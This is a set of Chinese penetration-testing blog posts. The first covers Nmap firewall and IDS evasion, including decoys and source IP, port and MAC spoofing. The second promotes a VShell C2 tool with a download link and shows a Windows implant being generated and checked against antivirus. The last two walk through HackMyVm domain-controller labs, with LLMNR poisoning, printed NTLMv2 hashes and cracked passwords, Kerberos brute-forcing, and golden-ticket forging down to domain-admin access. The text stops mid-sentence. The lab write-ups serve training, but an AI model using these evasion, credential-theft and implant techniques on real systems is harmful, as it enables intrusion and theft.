Nmap防火墙绕过技巧详解 防火墙与入侵检测系统（IDS）的核心工作逻辑，是依托规则匹配机制甄别并拦截异常扫描流量，比如识别 Nmap 标准探测包特征、单一源 IP 高频请求等行为。以下四类 Nmap 防火墙绕过技巧，核心思路在于利用设备规则漏洞，包括数据包片段重组缺陷、IP / 端口信任策略、流量特征识别盲区等，实现隐蔽扫描操作。所有操作均需获取 root 权限以构造自定义数据包，且必须在合法授权范围内执行。因缺乏实体防火墙设备，本文以本地靶机为测试环境展开演示，重点记录各类绕过技术的核心逻辑与操作方法。1 报文分段绕过1.1 技术原理多数防火墙与 IDS 设备会对完整的 TCP 或 UDP 数据包特征进行检测，比如 Nmap 默认探测包的标志位、数据长度等。Nmap 的-f参数可将扫描数据包拆分为小型片段，默认按 MTU 576 字节拆分后，每个片段仅 16 字节左右。部分老旧防火墙与 IDS 不具备数据包重组能力，拆分后的扫描流量难以被其识别，进而实现对拦截机制的规避。1.2 实操命令假设目标主机 10.10.10.178 的 80 端口已被防火墙过滤，可通过分段 + SYN 扫描精准探测该端口状态，命令如下：Nmap -f -sS 10.10.10.178 -p 80 # 分段+SYN扫描，重点探测80端口 执行结果示例结果解读未启用-f参数时，80 端口通常会显示为filtered状态，即无有效响应；启用分段功能后，拆分后的数据包可绕过防火墙检测，目标主机的响应会使端口状态变为open|filtered，后续可通过补充探测验证端口是否真正开放。1.3 适用场景适用：该技巧对不支持数据包重组功能的老旧防火墙效果显著，典型代表如部分企业仍在使用的旧版 Cisco ASA 设备。注意：现代主流防火墙（如 Palo Alto、华为 USG）均具备完善的数据包重组能力，该技术大概率失效。数据包拆分后会增加传输耗时，扫描速度明显变慢，可搭配-T4参数优化效率，命令为sudo Nmap -f -T4 -sS 10.10.10.178。2 自定义最大传输单元2.1 技术原理MTU（最大传输单元）指网络中可传输的单个数据包最大长度，以太网环境默认 MTU 值为 1500 字节。防火墙常针对标准 MTU 尺寸的数据包制定严格检测规则，Nmap 的--mtu参数可自定义数据包 MTU 值（需为 8 的倍数，常见可选值如 1480、1472 等）。通过发送非标准 MTU 尺寸的数据包，可避开防火墙针对标准流量的拦截策略，本质是报文分段技术的灵活进阶版本。2.2 实操命令若目标主机 10.10.10.178 的 443 端口被防火墙基于 MTU 1500 的规则过滤，可自定义 MTU 值进行探测，命令如下：sudo Nmap --mtu 1480 -sS 10.10.10.178 -p 443 # 自定义MTU 1480，扫描443端口 执行结果示例结果解读将 MTU 值设置为非标准的 1480 后，数据包长度脱离防火墙预设检测范围，拦截规则失效，可成功探测到 443 端口的实际开放状态。2.3 适用场景适用场景：当防火墙针对默认 MTU 1500 字节数据包设置专项检测规则，或-f参数的分段效果不佳时，自定义 MTU 是更优选择。注意事项：自定义 MTU 值必须严格遵循 8 的倍数规则（如 1480=8×185、1472=8×184），否则命令会直接报错无法执行。MTU 最小值建议不低于 64 字节，过小的数据包可能被防火墙判定为无效流量直接丢弃。3 诱饵隐藏扫描3.1 技术原理防火墙的核心检测逻辑之一是识别单一源 IP 的高频请求行为，以此判定扫描攻击。Nmap 的-D参数可生成多个虚拟诱饵 IP，这些 IP 可随机生成或手动指定固定地址，与真实扫描 IP 同步发送探测数据包。目标主机的日志会记录多个 IP 的并发请求，防火墙无法精准区分真实扫描源，从而实现真实 IP 的隐藏，避免被纳入黑名单。3.2 实操命令对目标主机 10.10.10.178 进行扫描时，可配置 3 个随机诱饵 IP 与 1 个内网网关固定诱饵 IP（10.10.10.1），命令如下：sudo Nmap -D RND:3,10.10.10.1 -sS 10.10.10.178 # 3个随机诱饵+1个固定诱饵 执行结果示例Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-05 09:50 CST Nmap scan report for 10.10.10.178 Host is up (0.00068s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https # 关键：目标防火墙日志会记录以下IP的请求，无法定位真实扫描端 # 诱饵IP：10.10.10.1（固定）、10.10.10.56（随机）、10.10.10.123（随机）、10.10.10.201（随机） # 真实IP：未单独记录，混在诱饵中 Nmap done: 1 IP address (1 host up) scanned in 2.15 seconds 结果解读扫描执行后，目标防火墙日志会同时记录多个 IP 的访问请求，包括固定诱饵 IP 10.10.10.1、3 个随机生成的诱饵 IP（如 10.10.10.56、10.10.10.123、10.10.10.201），真实扫描 IP 的请求会混在其中无法区分，有效规避了单一 IP 被拉黑的风险。最终探测结果显示，目标主机 22、80、443 等端口处于开放状态。3.3 适用场景适用场景：该技术适用于公网渗透测试等需要隐藏真实 IP 的场景，尤其适合对远程目标服务器的匿名探测。注意事项：诱饵 IP 需选择可达的有效地址，比如内网网段内的闲置 IP，无效 IP 发送的请求易被防火墙识别为异常扫描。诱饵数量建议控制在 3-5 个，数量过多会大幅增加扫描耗时，数量过少则无法达到有效的隐藏效果。4 源地址欺骗4.1 技术原理部分防火墙会配置 IP 白名单访问控制策略，仅允许特定可信 IP（如内网管理 IP、合作伙伴服务器 IP）访问目标端口。Nmap 的-S参数可将扫描数据包的源 IP 地址伪装为白名单中的可信地址，防火墙验证源 IP 符合信任规则后，会允许请求通过，从而绕过 IP 过滤机制实现扫描。4.2 实操命令假设目标主机 10.10.10.178 的防火墙仅允许内网管理 IP 10.10.10.2 访问 3389 端口，可通过伪装源 IP 进行探测，命令如下：sudo nmap -S 10.10.10.2 -sS 10.10.10.178 -p 3389 # 伪装成10.10.10.2（白名单IP） 执行结果示例Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-05 10:00 CST Nmap scan report for 10.10.10.178 Host is up (0.00071s latency). PORT STATE SERVICE 3389/tcp open ms-wbt-server # 原本被IP过滤的3389端口，现在显示open（伪装生效） Nmap done: 1 IP address (1 host up) scanned in 0.85 seconds 结果解读源 IP 伪装为白名单中的 10.10.10.2 后，防火墙放行该请求，扫描结果显示 3389 端口（ms-wbt-server 服务）处于开放状态，表明地址欺骗生效，成功绕过了 IP 过滤限制。4.3 适用场景适用场景：适用于已知防火墙 IP 白名单的场景，比如内网渗透测试中已获取管理 IP 信息，需访问被 IP 限制的关键端口时。注意事项：伪装的 IP 地址必须在防火墙白名单范围内，且扫描端与目标主机需保持通信可达，同网段环境下效果最佳，跨网段需依赖路由转发支持。由于目标主机会将响应数据包发送至伪装 IP，而非真实扫描端，可能无法直接接收响应结果，建议搭配-Pn（跳过 ping 检测）和-v（详细模式）确认扫描执行状态。5 源端口欺骗5.1 技术原理防火墙多针对数据包的源端口配置访问控制规则，常见策略是仅允许源端口为 53（DNS 服务）、80（HTTP 服务）、443（HTTPS 服务）等常用业务端口的请求通过，这类端口被默认为正常业务流量。Nmap 的--source-port参数（简写为-g）可手动指定扫描数据包的源端口，通过伪装成防火墙信任的正常业务端口，规避其端口过滤机制，实现扫描流量的放行。5.2 实操命令若目标主机 10.10.10.178 的防火墙仅允许源端口为 53（DNS）的请求访问 80 端口，可通过指定源端口的方式探测，命令如下：sudo nmap -g 53 -sS 10.10.10.178 -p 80 # 指定源端口53（DNS），扫描80端口 执行结果示例Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-05 10:10 CST Nmap scan report for 10.10.10.178 Host is up (0.00065s latency). PORT STATE SERVICE 80/tcp open http # 原本被源端口过滤的80端口，现在显示open（端口欺骗生效） Nmap done: 1 IP address (1 host up) scanned in 0.78 seconds 结果解读扫描数据包的源端口被伪装为 53 后，防火墙将其判定为 DNS 关联的正常 HTTP 请求，未执行拦截操作。扫描结果显示 80 端口处于 open 状态，表明源端口欺骗成功，有效绕过了防火墙的端口限制规则。5.3 适用场景适用场景：适用于防火墙配置了源端口白名单的环境，尤其当目标端口被限制仅允许常见业务端口访问时，该技术效果显著。注意事项：指定的源端口不能被本地其他服务占用，例如本地已启动 DNS 服务时，端口 53 处于占用状态，执行命令会直接报错。优先选择 53、80、443 等高频使用的业务端口，这类端口被防火墙纳入信任范围的概率更高，欺骗成功率也随之提升。6 附加随机数据6.1 技术原理入侵检测系统（IDS）多依赖 Nmap 标准探测包的固定特征（如固定数据长度、无额外附加数据）识别扫描行为。Nmap 的--data-length参数可在探测包中添加指定字节数的随机数据（如 100 字节），通过改变数据包的原有特征，让 IDS 的特征库无法精准匹配，从而绕过其检测机制。6.2 实操命令对目标主机 10.10.10.178 进行扫描时，可在探测包中附加 100 字节随机数据，命令如下：sudo nmap --data-length 100 -sS 10.10.10.178 # 附加100字节随机数据 执行结果示例Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-05 10:20 CST Nmap scan report for 10.10.10.178 Host is up (0.00073s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https # 关键：IDS未识别到扫描流量（因数据包含100字节随机数据，特征不匹配） # 未用--data-length时，该扫描会被IDS拦截，端口显示filtered Nmap done: 1 IP address (1 host up) scanned in 1.32 seconds 结果解读未使用--data-length参数时，扫描流量会因匹配 IDS 中的 Nmap 标准包特征被拦截，端口状态多显示为 filtered；附加 100 字节随机数据后，数据包特征发生改变，与 IDS 预设规则不匹配，未被拦截。最终探测到目标主机 22、80、443 等端口处于开放状态，扫描达到预期效果。6.3 适用场景适用场景：该技术对依赖固定特征库检测的 IDS 效果明显，例如旧版 Snort 等传统入侵检测系统，需模糊扫描流量特征时可优先使用。注意事项：随机数据长度建议控制在 50-200 字节区间，长度过小则难以改变数据包核心特征，过大可能被防火墙判定为异常流量直接丢弃。对基于行为分析的 IDS（如采用机器学习算法的检测系统）效果有限，这类系统不依赖固定特征，而是通过流量行为模式识别异常。7 MAC 地址欺骗7.1 技术原理局域网环境中的防火墙或交换机，部分会基于 MAC 地址配置访问过滤策略，仅允许特定可信设备（如内网打印机、核心服务器）的 MAC 地址访问目标资源。Nmap 的--spoof-mac参数可将扫描数据包的源 MAC 地址伪装为该信任列表中的地址，二层网络设备（如交换机）会将其判定为可信设备的请求，不执行拦截操作，从而实现绕过。该技术仅适用于局域网环境，因 MAC 地址属于二层通信标识，无法跨路由进行传输。7.2 实操命令假设目标主机 10.10.10.178（同局域网内）的交换机仅允许 MAC 地址为00:0C:29:12:34:56（内网打印机）的设备访问，可通过伪装该 MAC 地址扫描，命令如下：sudo nmap --spoof-mac 00:0C:29:12:34:56 -sS 10.10.10.178 # 伪装成打印机MAC 执行结果示例Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-05 10:30 CST Nmap scan report for 10.10.10.178 Host is up (0.00069s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http # 关键：交换机未拦截请求（因源MAC是信任的打印机MAC） # 未伪装时，扫描被交换机MAC过滤，端口显示filtered Nmap done: 1 IP address (1 host up) scanned in 0.92 seconds 结果解读源 MAC 地址伪装为信任的打印机地址后，局域网交换机未对扫描请求进行拦截，成功探测到目标主机 22、80 端口处于开放状态。未伪装时，扫描请求会被 MAC 过滤规则阻断，端口状态显示为 filtered，对比可见欺骗效果显著。7.3 适用场景适用场景：主要用于局域网渗透测试，例如内网环境中需绕过交换机的 MAC 白名单限制，访问被管控的目标主机时。注意事项：伪装的 MAC 地址需符合标准格式（如00:0C:29:xx:xx:xx，VMware 虚拟设备默认 MAC 前缀），可通过arp -a命令查看目标网段内的可信设备 MAC 地址。跨路由扫描时该技术完全无效，因为路由转发过程中会将数据包的源 MAC 地址替换为网关设备的 MAC 地址。8 总结Nmap 防火墙绕过技术的核心逻辑，均围绕利用防火墙 / IDS 的规则漏洞展开，通过改变数据包特征、隐藏真实访问源、伪装可信身份等方式，规避拦截机制。不同技术的适用场景与核心要点存在差异，实际应用中需结合目标网络环境（如局域网 / 公网）、设备类型（老旧 / 现代防火墙）、防护规则（IP / 端口 / MAC 白名单）等因素选择合适方案。往期推荐新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 Linux 信息收集，提权一键梭哈神器x-WAF，一个基于fuzz的WAF绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【OSCP】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略SQL注入中各种WAF的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种WAF绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

【红队工具】VShell v4.9.3 高级版，国产C2工具下载及使用 VShell下载链接链接: https://pan.baidu.com/s/1LGb4RPgxmJPDEdZlaHQOkA 提取码: ju5z图表呈现（精简对比表） 对比维度 vshell Cobalt Strike（CS） 工具状态 GitHub 下架、闭源、版本内部传播 官方维护、插件生态成熟 核心优势 操作流畅、适配前期打点 / 隧道搭建、Linux 原生支持 插件多、横向手段丰富、可修改特征、适配后渗透 Linux 支持 无需插件，功能完善 依赖第三方插件，功能有限 适用阶段 渗透测试前期（打点、隧道） 渗透测试后期（后渗透、横向移动） 首先打开网盘链接，下载相关的文件，上传到你自己的vps或者本地虚拟机中，这里我使用的是kali虚拟机然后修改配置文件使用命令vi ./conf/setting.conf重点关注这两个地方，一个是账号密码，你需要配置好你的账号密码，这里我就使用默认的，上面的那个jwt根据作者提示就留空web_username=admin web_password=qwe123qwe还有一个启动的端口信息我们执行这个文件的时候，发现没有权限，需要给它赋予一个执行权限chmod +x ./v_Linux_arm64再执行的时候，这里又出现了一个错误“exec format error” 是因为 你在 x86/x64 架构的 kali 上，运行了 ARM64 架构的程序如果你的需求是 “在 kali 上测试 ARM 架构的程序”，需安装 QEMU 模拟器（模拟 ARM 环境）这样就能正常执行了随后找到你kali的ip地址ip a打开浏览器，访问kali的ip以及对应的端口，再输入刚刚你配置文件./conf/setting.conf中的账号免密10.10.10.173:8082来到了管理登录界面，再次输入账号密码就能登录成功了我们创建一个TCP监听器在客户端生成选项中生成马选择stageless，生成windows正向连接马在电脑管家中扫描试试双击执行在客户端管理中上线成功再选择主机管理命令执行还有像文件管理，屏幕查看和监控就不展示了，可以实时的进行返回截图，太丝滑了。插件就只有默认携带的几个，可以自己在plugins目录添加四种隧道任你选择shell 在渗透测试中实用性极强，操作流畅、功能便捷，但目前已从 GitHub 下架，官方闭源且无法二次开发，现存版本多为行业内私下传播。对比老牌工具 Cobalt Strike（CS），二者各有优势：CS 插件生态丰富，横向渗透手段多、可灵活修改特征；vshell 更适合初始打点与隧道搭建，CS 则更适配后渗透阶段，二者可形成场景互补。值得一提的是，vshell 对 Linux 系统支持完善，无需额外插件就能实现 Linux 目标上线与后渗透操作；而 CS 需依赖插件才能支持 Linux，且相关功能有限。综合来看，vshell 是高效的前期辅助工具，与 CS 配合使用可提升整体渗透效率。本文原创于，https://longyusec.com  转载请注明原文链接出处

HackMyVm-DC04：难 14.1 外网打点nmap -sS -p- -T4 192.168.0.103 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'nmap -sS -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49680,49710,49765 -T4 192.168.0.103 -A自动重定向到这个域名编辑下面的文件，将ip和域名加入进去# windows C:\Windows\System32\drivers\etc\hostsLinux也要，不然扫描不到东西，这里他变成了重定向次数过多，而不是之前的无法访问网站echo "192.168.0.103 soupedecode.local" >> /etc/hosts使用dir进行目录扫描，扫出来一个这个目录dirb http://soupedecode.local还有一个服务器信息http://soupedecode.local/server-info这里有一个服务版本，可以使用searchsploit检索一下（没有发现任何有用的东西）我们一直往下翻，翻到了这个东西继续将这个域名添加到hosts中，就可以访问站点了，是一个登录框14.2 后台爆破打开burp，fuzz SQL注入、xss字典，都没有结果，使用相同的账号密码字典爆破也没有结果继续信息收集smbclient -L //192.168.0.103/ -N后续也尝试了各种枚举，也没有东西。。。。。。后边去看了看别人写的，就是这个机子很容易出问题，爆破几次后，后面怎么爆破都是403了最后爆破出来账号密码是 admin:nimda登录成功后会要求你输入ip地址可能是命令执行，但是尝试各种命令执行都失败了，只要和|，&相关的都不行，看来是做了过滤【RCE剖析】从0-1讲解RCE漏洞绕过，Windows与Linux/RCE漏洞绕过方式总结----实战解析14.3 LLMNR那就来试试DC3的LLMNR，我们在这个输入框里输入kali的ip地址responder -I eth0 -wdecho "websvc::soupedecode:e2985b38b501aed2:E5E63AAD4B475A06D1ECE4C7F78A2E60:010100000000000080646EFE3946DC01F711F570D52509F5000000000200080045004B0042004F0001001E00570049004E002D0043003700380051004F0038004100440032003100490004003400570049004E002D0043003700380051004F003800410044003200310049002E0045004B0042004F002E004C004F00430041004C000300140045004B0042004F002E004C004F00430041004C000500140045004B0042004F002E004C004F00430041004C000700080080646EFE3946DC01060004000200000008003000300000000000000000000000004000005C18B02FEAC5263030D32A3F0BCCDD51E0CAD786D3DFBABF65601AC3E74CE55D0A001000000000000000000000000000000000000900240063006900660073002F003100390032002E003100360038002E0030002E003100340038000000000000000000" > hash john hash --wordlist=/usr/share/wordlists/rockyou.txtwebsvc:jordan23密码已过期，应该知道怎么搞了吧14.5 近源攻击！按住esc进入选择用户界面，然后根据步骤一步一步走输入原来的账号密码选择ok，说明你密码输入对了随后就可以修改你的账号密码了14.6 smb信息收集账号密码 websvc:jordan23smbclient -L //192.168.0.103 -U "SOUPEDECODE.LOCAL/websvc%admin123"在c盘找到第一个flagsmbclient //192.168.0.103/C -U "SOUPEDECODE.LOCAL/websvc%admin123"14.7 查询域内SPN关联用户有了域内的账号密码，再来看看SPN，查询域内所有关联了 SPN 的用户，用来获取他们的凭据，没有结果14.8 枚举域内用户SIDpython /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/websvc@192.168.0.103 > users grep "SidTypeUser" /data/demo/users | awk -F '\\\\' '{print $2}' | awk '{print $1}' | sort -u > /data/demo/target_users.txt14.9 获取不需要预认证用户的AS-REP哈希结果没有impacket-GetNPUsers -dc-ip 192.168.0.103 soupedecode.local/ -usersfile target_users.txt > hash cat hash | grep +14.10 ldapdomaindump收集 LDAP 信息，获取域内用户列表、权限分组（如 Domain Admins）、账号状态（启用 / 禁用），锁定高价值目标（如 Administrator）。ldapdomaindump -u "SOUPEDECODE.LOCAL\websvc" -p admin123 192.168.0.103 python -m http.server访问8000端口，看到用户不属于任何特权组，仅仅是普通用户仔细翻翻看，找到一个默认的账号密码rtina979 ：Z~l3JhcV#7Q-1#M同样的密码过期，需要近源攻击！smbclient //192.168.0.103/C$ -U "SOUPEDECODE.LOCAL/rtina979%Z~l3JhcV#7Q-1#M"这里给你们一张表，输入清楚了哈，我输了十多遍，艹14.11 二次smb信息收集此时就能正常登录了在rtina979用户的Documents文件夹里找到一个rar压缩包，把它下载下来解压需要密码fcrackzip 工具只能用于破解 ZIP 文件，而我们的文件是 RAR 格式。使用 rar2john 将 RAR 文件转换为 John the Ripper 可识别的哈希格式。提取哈希：rar2john Report.rar > report_hash.txt使用字典攻击（使用 rockyou.txt）：john --wordlist=/usr/share/wordlists/rockyou.txt report_hash.txt解压，输入密码PASSWORD123解压出来会发现当前目录有一个htm文件是一个渗透测试报告在这个报告最后，能看到krbtgt的hash内容14.12 黄金票据攻击条件： 获取 KRBTGT 账户哈希 - 通过 DCSync 或其他方式 获取域 SID - 通过 LDAP 或 SMB 枚举 知道域名 - 目标域的完整名称 获取到了KRBTGT哈希 先验证一下是否是正确的，红色代表失败，紫色代表hash正确，或者账户禁用，或者密码过期等等0f55cdc40bd8f5814587f7e6b2f85e6f14.12.1 获取域SID域SID为：S-1-5-21-2986980474-46765180-2505414164python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/rtina979@192.168.0.10314.12.2 同步域时间在平时可能会遇到kali和靶机的时间一直都不同步，怎么使用ntpdate或者其他时间同步工具，就是同步不起来，就需要使用下面第一行的命令了systemctl stop systemd-timesyncd # 停止自动时间同步服务 ntpdate 192.168.0.103 # 强制同步时间14.12.3 生成管理员的黄金票据impacket-ticketer -nthash 0f55cdc40bd8f5814587f7e6b2f85e6f -domain-sid S-1-5-21-2986980474-46765180-2505414164 -domain soupedecode.local administrator14.12.4 导入票据到环境变量export KRB5CCNAME=administrator.ccache14.12.5 使用票据impacket-wmiexec soupedecode.local/administrator@dc01.soupedecode.local -k -target-ip 192.168.0.103至此渗透完成啦14.13 总结DC04 域渗透从外网打点起步，nmap 扫描发现目标开放 80、88、445 等端口，访问 80 端口需配置 hosts 解析域名，目录扫描找到后台登录页。爆破无果后，利用后台 IP 输入框发起 LLMNR 投毒，捕获 websvc 用户哈希并破解密码，通过近源攻击修改过期密码。登录 SMB 获取首个 flag 后，枚举域用户发现 rtina979 账号及密码，再次近源攻击修改密码。登录其 SMB 下载加密压缩包，破解后得到渗透报告，从中提取 krbtgt 用户哈希。获取域 SID 并同步时间后，生成 Administrator 黄金票据，导入环境变量后通过 wmiexec 成功登录域控，获取最高权限，全程依赖凭据获取与票据攻击，突破多重限制完成渗透。往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 Linux 信息收集，提权一键梭哈神器x-WAF，一个基于fuzz的WAF绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【OSCP】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略SQL注入中各种WAF的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种WAF绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

HackMyVm-DC03 ：中等 13.1 外网打点nmap -sS -p- -T4 192.168.215.185 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'卧槽什么都没有，这怎么打？nmap -sS -p 53,13487,65005 -T4 192.168.215.185 -A扫错了，哈哈哈哈，靶机重启，原来是我换wifi了再来nmap -sS -p- -T4 192.168.215.25 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'nmap -sS -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49672,49685 -T4 192.168.215.25 -A根据上面的dc2靶场进行信息收集一波,ldap协议是开启着的，还有smb协议enum4Linux-ng -A 192.168.215.25 -C13.2 尝试使用匿名登录smb匿名连接13.3 kerberos 用户名枚举kerbrute userenum -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames.txt --dc 192.168.215.25charlie administrator wreed11 webserver爆破smbnxc smb 192.168.215.25 -u user -p user13.4 爆破 kerberos 协议kerbrute bruteuser --dc 192.168.215.25 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames.txt wreed11 kerbrute bruteuser --dc 192.168.215.25 -d SOUPEDECODE.LOCAL /data/SecLists_Dict/Usernames/xato-net-10-million-usernames.txt charlie三个用户接失败13.4 LLMNR 投毒攻击13.4.1 具体流程骗取目标设备的账号密码哈希，具体流程如下： 监听局域网内的 LLMNR 请求：用 Responder（你之前用过的工具）等软件，在攻击机上监听局域网内的 LLMNR 广播； 伪造响应欺骗目标：当目标设备（比如域内的员工电脑）发起 LLMNR 请求（如解析 \\共享打印机名）时，攻击机抢先回复：“我就是你要找的设备，我的 IP 是攻击机 IP”； 骗取哈希值：目标设备相信后，会试图用当前登录用户的 “NTLM 哈希” 与攻击机建立连接（比如访问共享文件夹），攻击机就能捕获到这个哈希； 破解哈希或直接用哈希登录：拿到哈希后，可通过 hashcat 破解成明文密码，或直接用 “哈希传递（PTH）” 登录其他设备。 13.4.2 如何用 LLMNR 拿到域内哈希比如你在域渗透中，攻击机和目标域内的员工电脑在同一个网段（192.168.215.0/24）： 在 kali 上启动 Responder，开启 LLMNR 监听： 员工在电脑上误输入 \\不存在的共享名（比如 \\file-server），DNS 解析失败，触发 LLMNR 广播； Responder 捕获到这个请求，伪装成 file-server 回复员工电脑； 员工电脑用当前登录用户（比如 SOUPEDECODE\charlie）的 NTLM 哈希，尝试与攻击机建立 SMB 连接； Responder 成功捕获到 charlie 的哈希，你后续就可以用这个哈希进行 PTH 攻击，登录其他域内设备。 responder -I eth0 -wd这里应该是域控靶机的计划任务，所以能拿到hash拿到这个账号的hash，准备去爆破[SMB] NTLMv2-SSP Client : 240a:42c2:802:3c85:e8b7:3202:ffea:f6fd [SMB] NTLMv2-SSP Username : SOUPEDECODE\DC01$ [SMB] NTLMv2-SSP Hash : DC01$::SOUPEDECODE:b7c95f1435ed324f:38D48E36709F60B6B02218D61D394294:010100000000000000A791D28545DC0159ED6A549FAD342D0000000002000800330037005300330001001E00570049004E002D005500350050004500330055004F00300044004600550004003400570049004E002D005500350050004500330055004F0030004400460055002E0033003700530033002E004C004F00430041004C000300140033003700530033002E004C004F00430041004C000500140033003700530033002E004C004F00430041004C000700080000A791D28545DC010600040002000000080030003000000000000000000000000040000033BE778EBDE22DAB53FA856B26B3A1EABC23AFB04656C990D86DF46D0504C4230A0010000000000000000000000000000000000009002C0063006900660073002F0053004F005500500045004400450043004F00440045002E004C004F00430041004C000000000000000000 --- [SMB] NTLMv2-SSP Client : 240a:42c2:802:3c85:e8b7:3202:ffea:f6fd [SMB] NTLMv2-SSP Username : soupedecode\xkate578 [SMB] NTLMv2-SSP Hash : xkate578::soupedecode:0215e15662d218c6:75CB92B3BD84CC2BA33FD7549A0D1EA4:010100000000000000A791D28545DC018EC3298268DA333B0000000002000800330037005300330001001E00570049004E002D005500350050004500330055004F00300044004600550004003400570049004E002D005500350050004500330055004F0030004400460055002E0033003700530033002E004C004F00430041004C000300140033003700530033002E004C004F00430041004C000500140033003700530033002E004C004F00430041004C000700080000A791D28545DC010600040002000000080030003000000000000000000000000040000033BE778EBDE22DAB53FA856B26B3A1EABC23AFB04656C990D86DF46D0504C4230A0010000000000000000000000000000000000009001E0063006900660073002F00460069006C006500530065007200760065007200000000000000000013.5 smb渗透找到账号密码，查看smb服务器内有什么东西xkate578:jesuschrist smbclient -L //192.168.215.25/ -U xkate578登录到share共享文件夹，发现user.txt尝试上传，发现这个用户有上传文件的权限使用evil-winrm连接失败evil-winrm -i 192.168.215.25 -u xkate578 -p jesuschrist13.6 查询域内SPN关联用户查询寻域内所有关联了SPN的用户（用于发现这些用户的TGS票据，从而破解密码）13.7 枚举域内用户SIDxkate578这个用户有查看域内SID信息的权限python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/xkate578@192.168.215.25 > results.txt把这些用户名信息导出为一个用户字典grep "SidTypeUser" /data/demo/results.txt | awk -F '\\\\' '{print $2}' | awk '{print $1}' | sort -u > /data/demo/target_users.txt13.8 爆破 kerberos针对域用户 xkate578 进行 